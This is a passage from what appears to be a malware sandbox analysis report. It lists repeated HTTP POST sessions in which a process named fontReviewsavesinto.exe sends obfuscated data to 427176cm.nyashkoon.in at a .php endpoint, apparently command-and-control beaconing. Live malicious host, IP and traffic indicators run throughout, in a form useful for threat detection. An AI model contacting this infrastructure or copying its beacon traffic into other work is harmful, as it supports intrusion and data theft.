                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        68192.168.2.75003837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:16.428505898 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:16.786854029 CET1032OUTData Raw: 5b 59 43 5c 5c 5a 5a 5d 5e 5e 54 55 56 5d 5a 5e 5f 5b 59 5a 52 5d 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC\\ZZ]^^TUV]Z^_[YZR]RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A3T$_$.&3T<-+;=%?$<<=.53-$>#0;8)*&G!']*
                                        Nov 5, 2024 08:13:17.240402937 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:17.311666012 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:15 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        69192.168.2.75003937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:17.446203947 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:17.802412987 CET1032OUTData Raw: 5b 55 46 58 59 55 5f 55 5e 5e 54 55 56 58 5a 51 5f 57 59 59 52 50 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UFXYU_U^^TUVXZQ_WYYRPRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'!?$93;/8$Z=533+>[1'Z*X$'<=&G!']*/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        70192.168.2.75004037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:18.121412039 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:18.474458933 CET1300OUTData Raw: 5b 5b 43 5c 59 5f 5f 57 5e 5e 54 55 56 5d 5a 5b 5f 52 59 5e 52 58 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[C\Y__W^^TUV]Z[_RY^RXRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$2+%.9$#/; )C+'#>.U%,\0%8(*:&G!']*
                                        Nov 5, 2024 08:13:18.935084105 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:19.007200956 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 07 27 06 0d 09 23 5c 32 12 2b 3e 30 1e 35 09 33 11 3b 2d 02 11 33 55 28 55 2b 3f 32 16 37 00 32 1e 23 3e 37 06 23 58 33 1e 2b 31 2f 5a 07 10 25 11 24 21 23 52 26 58 24 5e 27 33 24 02 2a 2c 28 5d 21 02 20 01 26 02 39 5a 26 04 05 51 2c 00 26 0b 3a 2b 3f 5d 39 31 30 59 32 34 2c 54 0d 10 39 50 28 21 24 56 29 12 29 5f 26 51 38 57 34 13 02 00 3d 04 24 57 2a 2d 3e 58 24 30 33 0f 21 54 2d 56 26 05 0a 59 30 08 23 0f 25 32 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :'#\2+>053;-3U(U+?272#>7#X3+1/Z%$!#R&X$^'3$*,(]! &9Z&Q,&:+?]910Y24,T9P(!$V))_&Q8W4=$W*->X$03!T-V&Y0#%2%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        71192.168.2.75004137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:18.240391970 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:18.599292994 CET1032OUTData Raw: 5b 5d 43 5f 59 5b 5f 51 5e 5e 54 55 56 5b 5a 5f 5f 57 59 5c 52 5a 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []C_Y[_Q^^TUV[Z__WY\RZR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G3%=9_02<8+'=%(0'X*[1'/50=?Y0([*&G!']*#
                                        Nov 5, 2024 08:13:19.059637070 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:19.143359900 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        72192.168.2.75004237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:19.272088051 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:19.630601883 CET1032OUTData Raw: 5e 5e 43 5f 5c 5f 5a 54 5e 5e 54 55 56 5e 5a 5b 5f 52 59 5a 52 59 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^C_\_ZT^^TUV^Z[_RYZRYR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$;3=)Y'(^,(<[>C([%, )=3*Y3.43;+*&G!']*7
                                        Nov 5, 2024 08:13:20.091939926 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:20.166161060 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:18 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        73192.168.2.75004337.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:20.289836884 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:20.646085978 CET1028OUTData Raw: 5b 5c 43 5d 5c 59 5a 51 5e 5e 54 55 56 5a 5a 51 5f 5b 59 5c 52 5f 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\C]\YZQ^^TUVZZQ_[Y\R_RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@'T 3[>01;;$=0$<+X*[*U',"_&=$8?Y**&G!']*
                                        Nov 5, 2024 08:13:21.109777927 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:21.182967901 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        74192.168.2.75004437.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:21.303086996 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:21.661694050 CET1032OUTData Raw: 5e 5f 43 58 5c 5d 5f 50 5e 5e 54 55 56 5d 5a 51 5f 54 59 5d 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_CX\]_P^^TUV]ZQ_TY]RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.02(3*%14^/;,_*5 ',_=.6Q'<63-?_$^#Z=&G!']*
                                        Nov 5, 2024 08:13:22.113213062 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:22.182364941 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        75192.168.2.75004537.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:22.303754091 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:22.661789894 CET1032OUTData Raw: 5b 5c 46 5a 59 5b 5a 54 5e 5e 54 55 56 5d 5a 50 5f 5b 59 5c 52 50 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\FZY[ZT^^TUV]ZP_[Y\RPR\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.32,$=Y'T(Z/3*6;'<7*[.3.3(%87\*&G!']*
                                        Nov 5, 2024 08:13:23.133924961 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:23.215356112 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        76192.168.2.75004637.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:23.336884975 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:23.692976952 CET1032OUTData Raw: 5b 5c 46 5a 5c 5f 5f 56 5e 5e 54 55 56 59 5a 5a 5f 51 59 59 52 51 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [\FZ\__V^^TUVYZZ_QYYRQRXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-32X$1]$7/;,[=6 [3<=*$<-&-'++X**&G!']*+


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        77192.168.2.75004737.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:24.028347015 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:24.380542994 CET1300OUTData Raw: 5e 5d 46 5f 59 5d 5f 51 5e 5e 54 55 56 59 5a 5d 5f 5b 59 5e 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]F_Y]_Q^^TUVYZ]_[Y^RPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A$1/'13;8X*6#%? (..'Z60;$):&G!']*+
                                        Nov 5, 2024 08:13:24.849895954 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:24.929048061 CET308INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 13 24 01 2c 54 37 04 3e 51 2a 2e 01 01 21 51 3b 58 2c 3d 2f 03 25 20 20 1c 3e 2f 39 09 37 17 2a 5b 22 2e 28 5d 20 2d 2c 0b 3e 21 2f 5a 07 10 25 11 26 21 23 55 26 3d 38 1d 24 33 09 15 2a 2c 24 10 36 28 3f 58 25 05 3e 06 32 14 3b 1a 2c 39 03 56 39 16 05 5e 39 31 37 00 25 1e 2c 54 0d 10 3a 0f 29 32 3f 0b 28 2c 35 5f 25 27 20 57 23 3e 3b 5e 29 39 3b 0f 3c 5b 25 01 33 1e 1d 0b 36 54 26 0a 26 15 09 02 24 31 09 0f 26 08 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9$,T7>Q*.!Q;X,=/% >/97*[".(] -,>!/Z%&!#U&=8$3*,$6(?X%>2;,9V9^917%,T:)2?(,5_%' W#>;^)9;<[%36T&&$1&%U,.V0WQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        78192.168.2.75004837.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:24.149802923 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:24.505476952 CET1032OUTData Raw: 5b 54 43 52 59 5c 5a 55 5e 5e 54 55 56 5d 5a 58 5f 5b 59 5e 52 58 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TCRY\ZU^^TUV]ZX_[Y^RXR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'183-X%1'-+<_=%3$<*-*0<"07^%8;Z>*&G!']*
                                        Nov 5, 2024 08:13:24.971544027 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:25.049376011 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        79192.168.2.75004937.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:25.178421021 CET287OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:13:25.536699057 CET1032OUTData Raw: 5b 59 43 5b 59 5e 5f 51 5e 5e 54 55 56 5d 5a 5c 5f 53 59 50 52 59 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC[Y^_Q^^TUV]Z\_SYPRYRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C%2$$*31(/(_>%'$<)=-$/5$;]'+7Z)*&G!']*
                                        Nov 5, 2024 08:13:25.992337942 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:26.076636076 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        80192.168.2.75005037.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:26.195377111 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:26.552436113 CET1032OUTData Raw: 5b 54 46 5e 5c 59 5a 56 5e 5e 54 55 56 59 5a 59 5f 50 59 5c 52 5c 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [TF^\YZV^^TUVYZY_PY\R\RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.F3X32$T$\/88Y=($<_>=$&.7Y'(4**&G!']*+
                                        Nov 5, 2024 08:13:27.015495062 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:27.092144966 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        81192.168.2.75005137.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:27.413877964 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:27.771064043 CET1032OUTData Raw: 5e 5a 43 53 5c 5e 5f 57 5e 5e 54 55 56 5e 5a 5d 5f 54 59 59 52 5a 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZCS\^_W^^TUV^Z]_TYYRZR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'+$=>$';+='<[>>='/2]&><$=:&G!']*7
                                        Nov 5, 2024 08:13:28.232965946 CET25INHTTP/1.1 100 Continue
                                        Nov 5, 2024 08:13:28.308279037 CET158INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:13:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        82192.168.2.75005237.44.238.250807392C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 5, 2024 08:13:28.428934097 CET311OUTPOST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:13:28.786712885 CET1032OUTData Raw: 5b 55 43 58 5c 5f 5a 55 5e 5e 54 55 56 5e 5a 58 5f 56 59 5e 52 50 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
